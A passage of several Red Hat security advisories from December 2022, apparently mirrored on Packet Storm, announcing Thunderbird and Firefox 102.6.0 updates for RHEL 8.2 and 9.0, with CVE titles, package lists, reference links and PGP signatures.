thunderbird-102.6.0-2.el8_4.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el8_4.ppc64le.rpm  
thunderbird-debugsource-102.6.0-2.el8_4.ppc64le.rpm

s390x:  
thunderbird-102.6.0-2.el8_4.s390x.rpm  
thunderbird-debuginfo-102.6.0-2.el8_4.s390x.rpm  
thunderbird-debugsource-102.6.0-2.el8_4.s390x.rpm

x86_64:  
thunderbird-102.6.0-2.el8_4.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_4.x86_64.rpm  
thunderbird-debugsource-102.6.0-2.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45414  
https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhFdzjgjWX9erEAQgJoA//dXoxYRc6QpIZumqvdNX8mYhEcYpd18Xv  
hefH1VzXM5q0/uNtGCQMEQ3Jty+RJ8LCgRqSQWBh3M43Oubi2d6qL0S0cq9G1DC4  
LlMMLM359VOTqIQD615Q24GVrwYlZCmOmDlzVqt7ZWBOYmnCXTboosKkGio7AY29  
+jjZEtCYcUDlhkwHmP46eMjpQnsGyD30iRFGDXo2Bh2KhmMUzWWTz6+dMdZ2TKIY  
GBTS+Pxzn7wMDabZc9iYMPbxkU1TEwzBC9P0ZCLK5FlaQSkplfvmTu3/ToecQAkc  
EJUevbeivFsPs4tusrAw7lLRR6gE3ayFXodZ9MmzVDnbG6TI5L/AhcUv7kGJ7hn8  
j+uUHpm/mPU3W4Ux3jQKR5Bl/eEmnHTaw/UMkQP6Z3WFlUJkhIhkFoIX/Xz4BePE  
2yH/nqRxHGwobnPu0wwVmFzqz5x2AXzrFGlxGPus3VbkuI/M8ExdKIweU8Xj7EwF  
w8c72PDJMCK1atFlsXmsmNHhI8aqUhwJJQiCCfWKb+eTSKJNNjsXowSBdGdK8C8L  
Chnr4cHoN9hFc/81lo67D1sO4/R5sOYR/ZoBiHM3ibwteBYJSF5tUsnQ0BEDKvJH  
c4eb66Eowc1tdrpbzELxoChIcYvjD3PeLhU66QJQbGsNXRwJc8e/aLOa2dvm2vrz  
+MxZfcAttgU=3XRU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9075-01

Red Hat Security Advisory 2022-9076-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.6.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:9076-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9076  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-45414 CVE-2022-46872 CVE-2022-46874  
                   CVE-2022-46878 CVE-2022-46880 CVE-2022-46881  
                   CVE-2022-46882  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.6.0.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Quoting from an HTML email with certain tags will trigger  
network requests and load remote content, regardless of a configuration to  
block remote content (CVE-2022-45414)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2149868 - CVE-2022-45414 Mozilla: Quoting from an HTML email with certain tags will trigger network requests and load remote content, regardless of a configuration to block remote content  
2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
thunderbird-102.6.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
thunderbird-102.6.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
thunderbird-102.6.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45414  
https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ug/tzjgjWX9erEAQh0kA/9FYWQo7DPaJ42rNiE78pcFYEc6CA8ZGBP  
LHbv060pE98N3G61Kly7offDi2QrN7x0VVauoxugg9zcF8fnSTMpahR0sMZ4aAqM  
o+CaoYKvq+IvqYi+a0n+wuJFsrcNT4DsjcW3k6+52WEIPmpN4M0conmqXn0LP/yA  
Kx36GH0KJHWTnIokS1mfbUid4rtKAd3cF4KlSlbEVJu5RSPTBngAWPNld0upJLcy  
WD0B8bhSUn7H9tpMw3isqEfSDae9+YGXHkyb9MB3ICALMLlvkQibkbF9wo/1Up0M  
895bgOjQ/CoxJaHRk5pEK+fqwufiWtdABDYM12PRfk3aSdd54jDpT9HG9nV3cZHR  
boVdaeuOJFyZAzziiDZo2q9Je8Nm5ox8kgQ8UO5UY7Dr7AFNgbvIPYi3ISZ1RbZZ  
+9IuxSnW3YUrW/8QUqmyDruhS7deMYJogirvWdWwt5tSpAA5Tr7Aj1Cix3u8nHZZ  
Tej4JtE9Ch8gq7s7ppwj2hif+1JV7liUWtEp4YtKvqA+R/5svqBBwS6EI+4Woj72  
jY9YrporG0NoOPcWKt3bf5Zhr1fimiwnubJy5a6vDT9LheouWEEU+F51pz/u/ldB  
Jets+wx2yhT0fh7V/4rufKw6G3XhTo5dZwZnDzkLBDFSx57t7g5VMZta++olFUpe  
jcpjOgm6OJw=nZth  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9076-01

Red Hat Security Advisory 2022-9070-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9070-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9070  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
firefox-102.6.0-1.el8_2.src.rpm

aarch64:  
firefox-102.6.0-1.el8_2.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.aarch64.rpm  
firefox-debugsource-102.6.0-1.el8_2.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_2.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el8_2.s390x.rpm  
firefox-debuginfo-102.6.0-1.el8_2.s390x.rpm  
firefox-debugsource-102.6.0-1.el8_2.s390x.rpm

x86_64:  
firefox-102.6.0-1.el8_2.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
firefox-102.6.0-1.el8_2.src.rpm

aarch64:  
firefox-102.6.0-1.el8_2.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.aarch64.rpm  
firefox-debugsource-102.6.0-1.el8_2.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_2.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el8_2.s390x.rpm  
firefox-debuginfo-102.6.0-1.el8_2.s390x.rpm  
firefox-debugsource-102.6.0-1.el8_2.s390x.rpm

x86_64:  
firefox-102.6.0-1.el8_2.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
firefox-102.6.0-1.el8_2.src.rpm

aarch64:  
firefox-102.6.0-1.el8_2.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.aarch64.rpm  
firefox-debugsource-102.6.0-1.el8_2.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_2.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el8_2.s390x.rpm  
firefox-debuginfo-102.6.0-1.el8_2.s390x.rpm  
firefox-debugsource-102.6.0-1.el8_2.s390x.rpm

x86_64:  
firefox-102.6.0-1.el8_2.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhCNzjgjWX9erEAQherg/+LMLB/21bl4GmwLLL8/2eIGHY9tbmaSfl  
t0159LZ6kfabpE0j+buZ155ljY6aHzCuWcJBofBCIHAATgVjeZ1rzKdSEEJ2hqGt  
zrtXbpSq3e63YM9cgeeKGasOZk8GAq6IrRshqX0sE7YqkHjlxJiqZAU6GOal+RtC  
3SjBG2nCbEfgdRBPYr6GgBDN4KqvCDUdBFxK+TSv+5v2OL80m2kMpf6E7zsjPL3D  
VX6oEJ3P6gGatZZlq4BodglHPvPSL1yqwvucHQJ0V10G6WudFNBO8K6bQCLaRowl  
4BmqL82T/537ytSeClvjJQRaYH2pTuMC2PuF6Ryrrki+C/EVJYPA9Pj/NPWmsxhC  
YVKleKQ8NQpFsOJTy8NZ+STKJ0OE5Epm01AlDuiHRcr2WqqWIbd/yyYXYM9W3uYh  
L6vUU05JB16V3Au2IVeFR5lUpX16wkYgcIuijhXJfyJoPuVSYX9PxOcEydtKdyIw  
tZcCkn4aBaXP0af2heB6XbtHNVaPdzkVqZyvwUo1lMp2cheQpinalwD6002pUMB+  
i1eq4qP90rssf0EQqJ/e+W0yUlThzD4RCpK2RI1DsxM8/F7J7YLi40iH9smN3Sm8  
TLsYNfMldiuK1OTWKE8Chr/hJL6dlUvgGMH5/X+HqnFpHWztcDSoo4yZgRF3tJt+  
nua339DDTn8=kb0x  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9070-01

Red Hat Security Advisory 2022-9066-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9066-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9066  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
firefox-102.6.0-1.el9_0.src.rpm

aarch64:  
firefox-102.6.0-1.el9_0.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el9_0.aarch64.rpm  
firefox-debugsource-102.6.0-1.el9_0.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el9_0.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el9_0.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el9_0.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el9_0.s390x.rpm  
firefox-debuginfo-102.6.0-1.el9_0.s390x.rpm  
firefox-debugsource-102.6.0-1.el9_0.s390x.rpm

x86_64:  
firefox-102.6.0-1.el9_0.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el9_0.x86_64.rpm  
firefox-debugsource-102.6.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ug99zjgjWX9erEAQgEEhAAhJIHK1wjYGsYxmu5ZFkC0bBjQilJLpxJ  
t2udAbzqkPlRaycOzb0oL9mTRtDXICYBelKNA1vIr3WBbN5lrqC5oBSgUV7HQFG2  
HsXna0DkfkDyYGoCfrHYhnAzIqhVALBp5jfLYnGwpCNbSzoCvAs1AIa9x6GD8QE7  
fqSIg9s0ymOFZUsmHofAZz/P16QHg501kVKSNJB87E42gE5zwBO3umaZiRqjcc/f  
nIU2P/F/9kPxlTog54L1+secHf+I806KDYZc1GFpdJgqEgq9zexxU7bLbFqnXQ3c  
kFCGkyd4fCygW0PS320pzzYOW52T9TOPSLZ8xp9aXyrvWJcIuADPEd7zJcgChBEb  
kDBeaVtGB913ON/5boRt3maalvHLA95SlPq7eSih3VkbH8vUFrHE0Ayx2dQnbviM  
f6oO7Al+NFtKGzzHR05L4upOFG0j+CfNUxfBrBOCaw+aN2U01ziBZl0xpB8bh/j2  
uDfrkrwSENkGPmHyUcBwO7FdLXA6n4tJzJMa875Nl6MWLpM4I/zARCbMjUNnQtGo  
0xXw5FyR/6LNgK1yL4YSspD13BlAt9SQCjFhdqwp+5SwVqW2P19hUUGrq4RSkPB/  
YkH8WJHsT12gPVYhdtNd/yYDpnLtn+B35ct7EtIXkULDh6SUaSklGz+DhJkI8SgZ  
jl/TlPdWPKE=OzET  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm